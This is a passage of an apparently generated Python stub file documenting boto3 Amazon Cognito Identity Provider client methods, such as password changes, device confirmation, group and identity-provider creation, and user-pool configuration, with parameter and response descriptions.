    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AssociateSoftwareToken>`_

    :type AccessToken: string
    :param AccessToken: The access token.
    :type Session: string
    :param Session: The session that must be passed both ways in
        challenge-response calls to the service; allows authentication
        of the user as part of the MFA setup process.
    :rtype: dict
    :returns: A dict with ``SecretCode`` *(string)*, the shared secret
        used by the TOTP algorithm to generate one-time codes, and
        ``Session`` *(string)*, to be passed to subsequent
        challenge-response calls during MFA setup.
    """
    pass
def can_paginate(self, operation_name: str = None):
    """
    Check if an operation can be paginated.

    :type operation_name: string
    :param operation_name: The operation name, identical to the method
        name on the client. For example, if the method name is
        ``create_foo`` and you would normally invoke the operation as
        ``client.create_foo(**kwargs)``, then — provided the
        ``create_foo`` operation can be paginated — you can use
        ``client.get_paginator(\"create_foo\")``.
    :return: ``True`` if the operation can be paginated,
        ``False`` otherwise.
    """
    pass
def change_password(self, PreviousPassword: str, ProposedPassword: str, AccessToken: str) -> Dict:
    """
    Changes the password for a specified user in a user pool.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ChangePassword>`_

    :type PreviousPassword: string
    :param PreviousPassword: **[REQUIRED]** The old password.
    :type ProposedPassword: string
    :param ProposedPassword: **[REQUIRED]** The new password.
    :type AccessToken: string
    :param AccessToken: **[REQUIRED]** The access token.
    :rtype: dict
    :returns: An empty dict representing the server's response to the
        change-password request.
    """
    pass
def confirm_device(self, AccessToken: str, DeviceKey: str, DeviceSecretVerifierConfig: Dict = None, DeviceName: str = None) -> Dict:
    """
    Confirms tracking of the device. This API call is the one that
    begins device tracking.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ConfirmDevice>`_

    :type AccessToken: string
    :param AccessToken: **[REQUIRED]** The access token.
    :type DeviceKey: string
    :param DeviceKey: **[REQUIRED]** The device key.
    :type DeviceSecretVerifierConfig: dict
    :param DeviceSecretVerifierConfig: The configuration of the device
        secret verifier: ``PasswordVerifier`` *(string)*, the password
        verifier, and ``Salt`` *(string)*, the salt.
    :type DeviceName: string
    :param DeviceName: The device name.
    :rtype: dict
    :returns: A dict with ``UserConfirmationNecessary`` *(boolean)*,
        indicating whether user confirmation is necessary to confirm
        the device response.
    """
    pass
def confirm_forgot_password(self, ClientId: str, Username: str, ConfirmationCode: str, Password: str, SecretHash: str = None, AnalyticsMetadata: Dict = None, UserContextData: Dict = None) -> Dict:
    """
    Allows a user to enter a confirmation code to reset a forgotten
    password.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ConfirmForgotPassword>`_

    :type ClientId: string
    :param ClientId: **[REQUIRED]** The app client ID of the app
        associated with the user pool.
    :type Username: string
    :param Username: **[REQUIRED]** The user name of the user for whom
        you want to enter a code to retrieve a forgotten password.
    :type ConfirmationCode: string
    :param ConfirmationCode: **[REQUIRED]** The confirmation code sent
        by a user's request to retrieve a forgotten password.
    :type Password: string
    :param Password: **[REQUIRED]** The password sent by a user's
        request to retrieve a forgotten password.
    :type SecretHash: string
    :param SecretHash: A keyed-hash message authentication code (HMAC)
        calculated using the secret key of a user pool client and
        username plus the client ID in the message.
    :type AnalyticsMetadata: dict
    :param AnalyticsMetadata: The Amazon Pinpoint analytics metadata for
        collecting metrics for ``ConfirmForgotPassword`` calls; contains
        ``AnalyticsEndpointId`` *(string)*, the endpoint ID.
    :type UserContextData: dict
    :param UserContextData: Contextual data such as the user's device
        fingerprint, IP address, or location, used by Amazon Cognito
        advanced security to evaluate the risk of an unexpected event;
        contains ``EncodedData`` *(string)*.
    :rtype: dict
    :returns: An empty dict representing the server's response.
    """
    pass
def confirm_sign_up(self, ClientId: str, Username: str, ConfirmationCode: str, SecretHash: str = None, ForceAliasCreation: bool = None, AnalyticsMetadata: Dict = None, UserContextData: Dict = None) -> Dict:
    """
    Confirms registration of a user and handles the existing alias from
    a previous user.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ConfirmSignUp>`_

    :type ClientId: string
    :param ClientId: **[REQUIRED]** The ID of the app client associated
        with the user pool.
    :type Username: string
    :param Username: **[REQUIRED]** The user name of the user whose
        registration you wish to confirm.
    :type ConfirmationCode: string
    :param ConfirmationCode: **[REQUIRED]** The confirmation code sent
        by a user's request to confirm registration.
    :type SecretHash: string
    :param SecretHash: A keyed-hash message authentication code (HMAC)
        calculated using the secret key of a user pool client and
        username plus the client ID in the message.
    :type ForceAliasCreation: boolean
    :param ForceAliasCreation: Forces user confirmation irrespective of
        an existing alias; defaults to ``False``. When ``True`` and the
        phone number/email used for sign-up confirmation already exists
        as an alias with a different user, the call migrates the alias
        from the previous user to the newly created user being
        confirmed. When ``False``, the API throws an
        **AliasExistsException** error instead.
    :type AnalyticsMetadata: dict
    :param AnalyticsMetadata: The Amazon Pinpoint analytics metadata for
        collecting metrics for ``ConfirmSignUp`` calls; contains
        ``AnalyticsEndpointId`` *(string)*, the endpoint ID.
    :type UserContextData: dict
    :param UserContextData: Contextual data such as the user's device
        fingerprint, IP address, or location, used by Amazon Cognito
        advanced security to evaluate the risk of an unexpected event;
        contains ``EncodedData`` *(string)*.
    :rtype: dict
    :returns: An empty dict representing the server's response.
    """
    pass
def create_group(self, GroupName: str, UserPoolId: str, Description: str = None, RoleArn: str = None, Precedence: int = None) -> Dict:
    """Create a new group in the specified Amazon Cognito user pool.

    Invokes the Cognito Identity Provider ``CreateGroup`` operation.
    Requires developer credentials.

    Args:
        GroupName: Name of the new group; must be unique within the pool.
            **Required.**
        UserPoolId: ID of the user pool that will own the group.
            **Required.**
        Description: Optional human-readable description of the group.
        RoleArn: Optional IAM role ARN for the group; used in the
            ``cognito:roles`` and ``cognito:preferred_role`` claims of a
            member's tokens.
        Precedence: Optional non-negative integer. Zero is the highest
            precedence; when a user belongs to several groups, the group
            with the lowest ``Precedence`` value supplies the role ARN for
            the preferred-role claim. Two groups may share a value, in
            which case neither takes precedence. Defaults to null.

    Returns:
        dict: Response with a ``Group`` key containing ``GroupName``,
        ``UserPoolId``, ``Description``, ``RoleArn``, ``Precedence``,
        ``LastModifiedDate`` and ``CreationDate``.

    See also:
        `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/CreateGroup>`_
    """
    # Generated stub: the concrete implementation is injected by botocore
    # from the service model at client-creation time.
    pass
def create_identity_provider(self, UserPoolId: str, ProviderName: str, ProviderType: str, ProviderDetails: Dict, AttributeMapping: Dict = None, IdpIdentifiers: List = None) -> Dict:
    """Create an identity provider (IdP) for a user pool.

    Invokes the Cognito Identity Provider ``CreateIdentityProvider``
    operation.

    Args:
        UserPoolId: The user pool ID. **Required.**
        ProviderName: The identity provider name. **Required.**
        ProviderType: The provider type — one of ``'SAML'``,
            ``'Facebook'``, ``'Google'``, ``'LoginWithAmazon'`` or
            ``'OIDC'``. **Required.**
        ProviderDetails: Provider configuration details as a
            string-to-string mapping, e.g. ``MetadataURL`` or
            ``MetadataFile``. **Required.**
        AttributeMapping: Optional mapping of IdP attributes to standard
            and custom user pool attributes.
        IdpIdentifiers: Optional list of identity provider identifier
            strings.

    Returns:
        dict: Response with an ``IdentityProvider`` key echoing the pool
        ID, provider name/type/details, attribute mapping, identifiers,
        and ``LastModifiedDate`` / ``CreationDate`` timestamps.

    See also:
        `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/CreateIdentityProvider>`_
    """
    # Generated stub: the concrete implementation is injected by botocore
    # from the service model at client-creation time.
    pass
def create_resource_server(self, UserPoolId: str, Identifier: str, Name: str, Scopes: List = None) -> Dict:
    """Create a new OAuth 2.0 resource server and define custom scopes in it.

    Invokes the Cognito Identity Provider ``CreateResourceServer``
    operation.

    Args:
        UserPoolId: The user pool ID. **Required.**
        Identifier: A unique identifier for the resource server, commonly
            an HTTPS endpoint such as ``https://my-weather-api.example.com``.
            **Required.**
        Name: A friendly display name for the resource server.
            **Required.**
        Scopes: Optional list of scope dicts, each with required
            ``ScopeName`` and ``ScopeDescription`` string keys.

    Returns:
        dict: Response with a ``ResourceServer`` key containing
        ``UserPoolId``, ``Identifier``, ``Name`` and the list of defined
        ``Scopes``.

    See also:
        `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/CreateResourceServer>`_
    """
    # Generated stub: the concrete implementation is injected by botocore
    # from the service model at client-creation time.
    pass
def create_user_import_job(self, JobName: str, UserPoolId: str, CloudWatchLogsRoleArn: str) -> Dict:
    """Create a user import job for bulk-importing users from a CSV file.

    Invokes the Cognito Identity Provider ``CreateUserImportJob``
    operation.

    Args:
        JobName: The name of the import job. **Required.**
        UserPoolId: ID of the user pool the users will be imported into.
            **Required.**
        CloudWatchLogsRoleArn: ARN of the CloudWatch Logs IAM role used to
            log the import. **Required.**

    Returns:
        dict: Response with a ``UserImportJob`` key containing the job
        name and ID, the pool ID, a ``PreSignedUrl`` for uploading the
        ``.csv`` file, creation/start/completion timestamps, a ``Status``
        string (``'Created'``, ``'Pending'``, ``'InProgress'``,
        ``'Stopping'``, ``'Expired'``, ``'Stopped'``, ``'Failed'`` or
        ``'Succeeded'``), the logging role ARN, imported/skipped/failed
        user counts, and a ``CompletionMessage``.

    See also:
        `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/CreateUserImportJob>`_
    """
    # Generated stub: the concrete implementation is injected by botocore
    # from the service model at client-creation time.
    pass
def create_user_pool(self, PoolName: str, Policies: Dict = None, LambdaConfig: Dict = None, AutoVerifiedAttributes: List = None, AliasAttributes: List = None, UsernameAttributes: List = None, SmsVerificationMessage: str = None, EmailVerificationMessage: str = None, EmailVerificationSubject: str = None, VerificationMessageTemplate: Dict = None, SmsAuthenticationMessage: str = None, MfaConfiguration: str = None, DeviceConfiguration: Dict = None, EmailConfiguration: Dict = None, SmsConfiguration: Dict = None, UserPoolTags: Dict = None, AdminCreateUserConfig: Dict = None, Schema: List = None, UserPoolAddOns: Dict = None) -> Dict:
"""
Creates a new Amazon Cognito user pool and sets the password policy for the pool.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/CreateUserPool>`_
**Request Syntax**
::
response = client.create_user_pool(
PoolName='string',
Policies={
'PasswordPolicy': {
'MinimumLength': 123,
'RequireUppercase': True|False,
'RequireLowercase': True|False,
'RequireNumbers': True|False,
'RequireSymbols': True|False
}
},
LambdaConfig={
'PreSignUp': 'string',
'CustomMessage': 'string',
'PostConfirmation': 'string',
'PreAuthentication': 'string',
'PostAuthentication': 'string',
'DefineAuthChallenge': 'string',
'CreateAuthChallenge': 'string',
'VerifyAuthChallengeResponse': 'string',
'PreTokenGeneration': 'string',
'UserMigration': 'string'
},
AutoVerifiedAttributes=[
'phone_number'|'email',
],
AliasAttributes=[
'phone_number'|'email'|'preferred_username',
],
UsernameAttributes=[
'phone_number'|'email',
],
SmsVerificationMessage='string',
EmailVerificationMessage='string',
EmailVerificationSubject='string',
VerificationMessageTemplate={
'SmsMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string',
'EmailMessageByLink': 'string',
'EmailSubjectByLink': 'string',
'DefaultEmailOption': 'CONFIRM_WITH_LINK'|'CONFIRM_WITH_CODE'
},
SmsAuthenticationMessage='string',
MfaConfiguration='OFF'|'ON'|'OPTIONAL',
DeviceConfiguration={
'ChallengeRequiredOnNewDevice': True|False,
'DeviceOnlyRememberedOnUserPrompt': True|False
},
EmailConfiguration={
'SourceArn': 'string',
'ReplyToEmailAddress': 'string',
'EmailSendingAccount': 'COGNITO_DEFAULT'|'DEVELOPER'
},
SmsConfiguration={
'SnsCallerArn': 'string',
'ExternalId': 'string'
},
UserPoolTags={
'string': 'string'
},
AdminCreateUserConfig={
'AllowAdminCreateUserOnly': True|False,
'UnusedAccountValidityDays': 123,
'InviteMessageTemplate': {
'SMSMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string'
}
},
Schema=[
{
'Name': 'string',
'AttributeDataType': 'String'|'Number'|'DateTime'|'Boolean',
'DeveloperOnlyAttribute': True|False,
'Mutable': True|False,
'Required': True|False,
'NumberAttributeConstraints': {
'MinValue': 'string',
'MaxValue': 'string'
},
'StringAttributeConstraints': {
'MinLength': 'string',
'MaxLength': 'string'
}
},
],
UserPoolAddOns={
'AdvancedSecurityMode': 'OFF'|'AUDIT'|'ENFORCED'
}
)
**Response Syntax**
::
{
'UserPool': {
'Id': 'string',
'Name': 'string',
'Policies': {
'PasswordPolicy': {
'MinimumLength': 123,
'RequireUppercase': True|False,
'RequireLowercase': True|False,
'RequireNumbers': True|False,
'RequireSymbols': True|False
}
},
'LambdaConfig': {
'PreSignUp': 'string',
'CustomMessage': 'string',
'PostConfirmation': 'string',
'PreAuthentication': 'string',
'PostAuthentication': 'string',
'DefineAuthChallenge': 'string',
'CreateAuthChallenge': 'string',
'VerifyAuthChallengeResponse': 'string',
'PreTokenGeneration': 'string',
'UserMigration': 'string'
},
'Status': 'Enabled'|'Disabled',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1),
'SchemaAttributes': [
{
'Name': 'string',
'AttributeDataType': 'String'|'Number'|'DateTime'|'Boolean',
'DeveloperOnlyAttribute': True|False,
'Mutable': True|False,
'Required': True|False,
'NumberAttributeConstraints': {
'MinValue': 'string',
'MaxValue': 'string'
},
'StringAttributeConstraints': {
'MinLength': 'string',
'MaxLength': 'string'
}
},
],
'AutoVerifiedAttributes': [
'phone_number'|'email',
],
'AliasAttributes': [
'phone_number'|'email'|'preferred_username',
],
'UsernameAttributes': [
'phone_number'|'email',
],
'SmsVerificationMessage': 'string',
'EmailVerificationMessage': 'string',
'EmailVerificationSubject': 'string',
'VerificationMessageTemplate': {
'SmsMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string',
'EmailMessageByLink': 'string',
'EmailSubjectByLink': 'string',
'DefaultEmailOption': 'CONFIRM_WITH_LINK'|'CONFIRM_WITH_CODE'
},
'SmsAuthenticationMessage': 'string',
'MfaConfiguration': 'OFF'|'ON'|'OPTIONAL',
'DeviceConfiguration': {
'ChallengeRequiredOnNewDevice': True|False,
'DeviceOnlyRememberedOnUserPrompt': True|False
},
'EstimatedNumberOfUsers': 123,
'EmailConfiguration': {
'SourceArn': 'string',
'ReplyToEmailAddress': 'string',
'EmailSendingAccount': 'COGNITO_DEFAULT'|'DEVELOPER'
},
'SmsConfiguration': {
'SnsCallerArn': 'string',
'ExternalId': 'string'
},
'UserPoolTags': {
'string': 'string'
},
'SmsConfigurationFailure': 'string',
'EmailConfigurationFailure': 'string',
'Domain': 'string',
'CustomDomain': 'string',
'AdminCreateUserConfig': {
'AllowAdminCreateUserOnly': True|False,
'UnusedAccountValidityDays': 123,
'InviteMessageTemplate': {
'SMSMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string'
}
},
'UserPoolAddOns': {
'AdvancedSecurityMode': 'OFF'|'AUDIT'|'ENFORCED'
},
'Arn': 'string'
}
}
**Response Structure**
- *(dict) --*
Represents the response from the server for the request to create a user pool.
- **UserPool** *(dict) --*
A container for the user pool details.
- **Id** *(string) --*
The ID of the user pool.
- **Name** *(string) --*
The name of the user pool.
- **Policies** *(dict) --*
The policies associated with the user pool.
- **PasswordPolicy** *(dict) --*
The password policy.
- **MinimumLength** *(integer) --*
The minimum length of the password policy that you have set. Cannot be less than 6.
- **RequireUppercase** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one uppercase letter in their password.
- **RequireLowercase** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one lowercase letter in their password.
- **RequireNumbers** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one number in their password.
- **RequireSymbols** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one symbol in their password.
- **LambdaConfig** *(dict) --*
The AWS Lambda triggers associated with the user pool.
- **PreSignUp** *(string) --*
A pre-registration AWS Lambda trigger.
- **CustomMessage** *(string) --*
A custom Message AWS Lambda trigger.
- **PostConfirmation** *(string) --*
A post-confirmation AWS Lambda trigger.
- **PreAuthentication** *(string) --*
A pre-authentication AWS Lambda trigger.
- **PostAuthentication** *(string) --*
A post-authentication AWS Lambda trigger.
- **DefineAuthChallenge** *(string) --*
Defines the authentication challenge.
- **CreateAuthChallenge** *(string) --*
Creates an authentication challenge.
- **VerifyAuthChallengeResponse** *(string) --*
Verifies the authentication challenge response.
- **PreTokenGeneration** *(string) --*
A Lambda trigger that is invoked before token generation.
- **UserMigration** *(string) --*
The user migration Lambda config type.
- **Status** *(string) --*
The status of a user pool.
- **LastModifiedDate** *(datetime) --*
The date the user pool was last modified.
- **CreationDate** *(datetime) --*
The date the user pool was created.
- **SchemaAttributes** *(list) --*
A container with the schema attributes of a user pool.
- *(dict) --*
Contains information about the schema attribute.
- **Name** *(string) --*
A schema attribute of the name type.
- **AttributeDataType** *(string) --*
The attribute data type.
- **DeveloperOnlyAttribute** *(boolean) --*
Specifies whether the attribute type is developer only.
- **Mutable** *(boolean) --*
Specifies whether the value of the attribute can be changed.
For any user pool attribute that's mapped to an identity provider attribute, you must set this parameter to ``true`` . Amazon Cognito updates mapped attributes when users sign in to your application through an identity provider. If an attribute is immutable, Amazon Cognito throws an error when it attempts to update the attribute. For more information, see `Specifying Identity Provider Attribute Mappings for Your User Pool <https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-specifying-attribute-mapping.html>`__ .
- **Required** *(boolean) --*
Specifies whether a user pool attribute is required. If the attribute is required and the user does not provide a value, registration or sign-in will fail.
- **NumberAttributeConstraints** *(dict) --*
Specifies the constraints for an attribute of the number type.
- **MinValue** *(string) --*
The minimum value of an attribute that is of the number data type.
- **MaxValue** *(string) --*
The maximum value of an attribute that is of the number data type.
- **StringAttributeConstraints** *(dict) --*
Specifies the constraints for an attribute of the string type.
- **MinLength** *(string) --*
The minimum length.
- **MaxLength** *(string) --*
The maximum length.
- **AutoVerifiedAttributes** *(list) --*
Specifies the attributes that are auto-verified in a user pool.
- *(string) --*
- **AliasAttributes** *(list) --*
Specifies the attributes that are aliased in a user pool.
- *(string) --*
- **UsernameAttributes** *(list) --*
Specifies whether email addresses or phone numbers can be specified as usernames when a user signs up.
- *(string) --*
- **SmsVerificationMessage** *(string) --*
The contents of the SMS verification message.
- **EmailVerificationMessage** *(string) --*
The contents of the email verification message.
- **EmailVerificationSubject** *(string) --*
The subject of the email verification message.
- **VerificationMessageTemplate** *(dict) --*
The template for verification messages.
- **SmsMessage** *(string) --*
The SMS message template.
- **EmailMessage** *(string) --*
The email message template.
- **EmailSubject** *(string) --*
The subject line for the email message template.
- **EmailMessageByLink** *(string) --*
The email message template for sending a confirmation link to the user.
- **EmailSubjectByLink** *(string) --*
The subject line for the email message template for sending a confirmation link to the user.
- **DefaultEmailOption** *(string) --*
The default email option.
- **SmsAuthenticationMessage** *(string) --*
The contents of the SMS authentication message.
- **MfaConfiguration** *(string) --*
Can be one of the following values:
* ``OFF`` - MFA tokens are not required and cannot be specified during user registration.
* ``ON`` - MFA tokens are required for all user registrations. You can only specify required when you are initially creating a user pool.
* ``OPTIONAL`` - Users have the option when registering to create an MFA token.
- **DeviceConfiguration** *(dict) --*
The device configuration.
- **ChallengeRequiredOnNewDevice** *(boolean) --*
Indicates whether a challenge is required on a new device. Only applicable to a new device.
- **DeviceOnlyRememberedOnUserPrompt** *(boolean) --*
If true, a device is only remembered on user prompt.
- **EstimatedNumberOfUsers** *(integer) --*
A number estimating the size of the user pool.
- **EmailConfiguration** *(dict) --*
The email configuration.
- **SourceArn** *(string) --*
The Amazon Resource Name (ARN) of a verified email address in Amazon SES. This email address is used in one of the following ways, depending on the value that you specify for the ``EmailSendingAccount`` parameter:
* If you specify ``COGNITO_DEFAULT`` , Amazon Cognito uses this address as the custom FROM address when it emails your users by using its built-in email account.
* If you specify ``DEVELOPER`` , Amazon Cognito emails your users with this address by calling Amazon SES on your behalf.
- **ReplyToEmailAddress** *(string) --*
The destination to which the receiver of the email should reply to.
- **EmailSendingAccount** *(string) --*
Specifies whether Amazon Cognito emails your users by using its built-in email functionality or your Amazon SES email configuration. Specify one of the following values:
COGNITO_DEFAULT
When Amazon Cognito emails your users, it uses its built-in email functionality. When you use the default option, Amazon Cognito allows only a limited number of emails each day for your user pool. For typical production environments, the default email limit is below the required delivery volume. To achieve a higher delivery volume, specify DEVELOPER to use your Amazon SES email configuration.
To look up the email delivery limit for the default option, see `Limits in Amazon Cognito <https://docs.aws.amazon.com/cognito/latest/developerguide/limits.html>`__ in the *Amazon Cognito Developer Guide* .
The default FROM address is no-reply@verificationemail.com. To customize the FROM address, provide the ARN of an Amazon SES verified email address for the ``SourceArn`` parameter.
DEVELOPER
When Amazon Cognito emails your users, it uses your Amazon SES configuration. Amazon Cognito calls Amazon SES on your behalf to send email from your verified email address. When you use this option, the email delivery limits are the same limits that apply to your Amazon SES verified email address in your AWS account.
If you use this option, you must provide the ARN of an Amazon SES verified email address for the ``SourceArn`` parameter.
Before Amazon Cognito can email your users, it requires additional permissions to call Amazon SES on your behalf. When you update your user pool with this option, Amazon Cognito creates a *service-linked role* , which is a type of IAM role, in your AWS account. This role contains the permissions that allow Amazon Cognito to access Amazon SES and send email messages with your address. For more information about the service-linked role that Amazon Cognito creates, see `Using Service-Linked Roles for Amazon Cognito <https://docs.aws.amazon.com/cognito/latest/developerguide/using-service-linked-roles.html>`__ in the *Amazon Cognito Developer Guide* .
- **SmsConfiguration** *(dict) --*
The SMS configuration.
- **SnsCallerArn** *(string) --*
The Amazon Resource Name (ARN) of the Amazon Simple Notification Service (SNS) caller.
- **ExternalId** *(string) --*
The external ID.
- **UserPoolTags** *(dict) --*
The tags that are assigned to the user pool. A tag is a label that you can apply to user pools to categorize and manage them in different ways, such as by purpose, owner, environment, or other criteria.
- *(string) --*
- *(string) --*
- **SmsConfigurationFailure** *(string) --*
The reason why the SMS configuration cannot send the messages to your users.
- **EmailConfigurationFailure** *(string) --*
The reason why the email configuration cannot send the messages to your users.
- **Domain** *(string) --*
Holds the domain prefix if the user pool has a domain associated with it.
- **CustomDomain** *(string) --*
A custom domain name that you provide to Amazon Cognito. This parameter applies only if you use a custom domain to host the sign-up and sign-in pages for your application. For example: ``auth.example.com`` .
For more information about adding a custom domain to your user pool, see `Using Your Own Domain for the Hosted UI <https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-add-custom-domain.html>`__ .
- **AdminCreateUserConfig** *(dict) --*
The configuration for ``AdminCreateUser`` requests.
- **AllowAdminCreateUserOnly** *(boolean) --*
Set to ``True`` if only the administrator is allowed to create user profiles. Set to ``False`` if users can sign themselves up via an app.
- **UnusedAccountValidityDays** *(integer) --*
The user account expiration limit, in days, after which the account is no longer usable. To reset the account after that time limit, you must call ``AdminCreateUser`` again, specifying ``"RESEND"`` for the ``MessageAction`` parameter. The default value for this parameter is 7.
.. note::
If you set a value for ``TemporaryPasswordValidityDays`` in ``PasswordPolicy`` , that value will be used and ``UnusedAccountValidityDays`` will be deprecated for that user pool.
- **InviteMessageTemplate** *(dict) --*
The message template to be used for the welcome message to new users.
See also `Customizing User Invitation Messages <http://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pool-settings-message-customizations.html#cognito-user-pool-settings-user-invitation-message-customization>`__ .
- **SMSMessage** *(string) --*
The message template for SMS messages.
- **EmailMessage** *(string) --*
The message template for email messages.
- **EmailSubject** *(string) --*
The subject line for email messages.
- **UserPoolAddOns** *(dict) --*
The user pool add-ons.
- **AdvancedSecurityMode** *(string) --*
The advanced security mode.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) for the user pool.
:type PoolName: string
:param PoolName: **[REQUIRED]**
A string used to name the user pool.
:type Policies: dict
:param Policies:
The policies associated with the new user pool.
- **PasswordPolicy** *(dict) --*
The password policy.
- **MinimumLength** *(integer) --*
The minimum length of the password policy that you have set. Cannot be less than 6.
- **RequireUppercase** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one uppercase letter in their password.
- **RequireLowercase** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one lowercase letter in their password.
- **RequireNumbers** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one number in their password.
- **RequireSymbols** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one symbol in their password.
:type LambdaConfig: dict
:param LambdaConfig:
The Lambda trigger configuration information for the new user pool.
.. note::
In a push model, event sources (such as Amazon S3 and custom applications) need permission to invoke a function. So you will need to make an extra call to add permission for these event sources to invoke your Lambda function.
For more information on using the Lambda API to add permission, see `AddPermission <https://docs.aws.amazon.com/lambda/latest/dg/API_AddPermission.html>`__ .
For adding permission using the AWS CLI, see `add-permission <https://docs.aws.amazon.com/cli/latest/reference/lambda/add-permission.html>`__ .
- **PreSignUp** *(string) --*
A pre-registration AWS Lambda trigger.
- **CustomMessage** *(string) --*
A custom Message AWS Lambda trigger.
- **PostConfirmation** *(string) --*
A post-confirmation AWS Lambda trigger.
- **PreAuthentication** *(string) --*
A pre-authentication AWS Lambda trigger.
- **PostAuthentication** *(string) --*
A post-authentication AWS Lambda trigger.
- **DefineAuthChallenge** *(string) --*
Defines the authentication challenge.
- **CreateAuthChallenge** *(string) --*
Creates an authentication challenge.
- **VerifyAuthChallengeResponse** *(string) --*
Verifies the authentication challenge response.
- **PreTokenGeneration** *(string) --*
A Lambda trigger that is invoked before token generation.
- **UserMigration** *(string) --*
The user migration Lambda config type.
:type AutoVerifiedAttributes: list
:param AutoVerifiedAttributes:
The attributes to be auto-verified. Possible values: **email** , **phone_number** .
- *(string) --*
:type AliasAttributes: list
:param AliasAttributes:
Attributes supported as an alias for this user pool. Possible values: **phone_number** , **email** , or **preferred_username** .
- *(string) --*
:type UsernameAttributes: list
:param UsernameAttributes:
Specifies whether email addresses or phone numbers can be specified as usernames when a user signs up.
- *(string) --*
:type SmsVerificationMessage: string
:param SmsVerificationMessage:
A string representing the SMS verification message.
:type EmailVerificationMessage: string
:param EmailVerificationMessage:
A string representing the email verification message.
:type EmailVerificationSubject: string
:param EmailVerificationSubject:
A string representing the email verification subject.
:type VerificationMessageTemplate: dict
:param VerificationMessageTemplate:
The template for the verification message that the user sees when the app requests permission to access the user\'s information.
- **SmsMessage** *(string) --*
The SMS message template.
- **EmailMessage** *(string) --*
The email message template.
- **EmailSubject** *(string) --*
The subject line for the email message template.
- **EmailMessageByLink** *(string) --*
The email message template for sending a confirmation link to the user.
- **EmailSubjectByLink** *(string) --*
The subject line for the email message template for sending a confirmation link to the user.
- **DefaultEmailOption** *(string) --*
The default email option.
:type SmsAuthenticationMessage: string
:param SmsAuthenticationMessage:
A string representing the SMS authentication message.
:type MfaConfiguration: string
:param MfaConfiguration:
Specifies MFA configuration details.
:type DeviceConfiguration: dict
:param DeviceConfiguration:
The device configuration.
- **ChallengeRequiredOnNewDevice** *(boolean) --*
Indicates whether a challenge is required on a new device. Only applicable to a new device.
- **DeviceOnlyRememberedOnUserPrompt** *(boolean) --*
If true, a device is only remembered on user prompt.
:type EmailConfiguration: dict
:param EmailConfiguration:
The email configuration.
- **SourceArn** *(string) --*
The Amazon Resource Name (ARN) of a verified email address in Amazon SES. This email address is used in one of the following ways, depending on the value that you specify for the ``EmailSendingAccount`` parameter:
* If you specify ``COGNITO_DEFAULT`` , Amazon Cognito uses this address as the custom FROM address when it emails your users by using its built-in email account.
* If you specify ``DEVELOPER`` , Amazon Cognito emails your users with this address by calling Amazon SES on your behalf.
- **ReplyToEmailAddress** *(string) --*
The destination to which the receiver of the email should reply to.
- **EmailSendingAccount** *(string) --*
Specifies whether Amazon Cognito emails your users by using its built-in email functionality or your Amazon SES email configuration. Specify one of the following values:
COGNITO_DEFAULT
When Amazon Cognito emails your users, it uses its built-in email functionality. When you use the default option, Amazon Cognito allows only a limited number of emails each day for your user pool. For typical production environments, the default email limit is below the required delivery volume. To achieve a higher delivery volume, specify DEVELOPER to use your Amazon SES email configuration.
To look up the email delivery limit for the default option, see `Limits in Amazon Cognito <https://docs.aws.amazon.com/cognito/latest/developerguide/limits.html>`__ in the *Amazon Cognito Developer Guide* .
The default FROM address is no-reply@verificationemail.com. To customize the FROM address, provide the ARN of an Amazon SES verified email address for the ``SourceArn`` parameter.
DEVELOPER
When Amazon Cognito emails your users, it uses your Amazon SES configuration. Amazon Cognito calls Amazon SES on your behalf to send email from your verified email address. When you use this option, the email delivery limits are the same limits that apply to your Amazon SES verified email address in your AWS account.
If you use this option, you must provide the ARN of an Amazon SES verified email address for the ``SourceArn`` parameter.
Before Amazon Cognito can email your users, it requires additional permissions to call Amazon SES on your behalf. When you update your user pool with this option, Amazon Cognito creates a *service-linked role* , which is a type of IAM role, in your AWS account. This role contains the permissions that allow Amazon Cognito to access Amazon SES and send email messages with your address. For more information about the service-linked role that Amazon Cognito creates, see `Using Service-Linked Roles for Amazon Cognito <https://docs.aws.amazon.com/cognito/latest/developerguide/using-service-linked-roles.html>`__ in the *Amazon Cognito Developer Guide* .
:type SmsConfiguration: dict
:param SmsConfiguration:
The SMS configuration.
- **SnsCallerArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) of the Amazon Simple Notification Service (SNS) caller.
- **ExternalId** *(string) --*
The external ID.
:type UserPoolTags: dict
:param UserPoolTags:
The tag keys and values to assign to the user pool. A tag is a label that you can use to categorize and manage user pools in different ways, such as by purpose, owner, environment, or other criteria.
- *(string) --*
- *(string) --*
:type AdminCreateUserConfig: dict
:param AdminCreateUserConfig:
The configuration for ``AdminCreateUser`` requests.
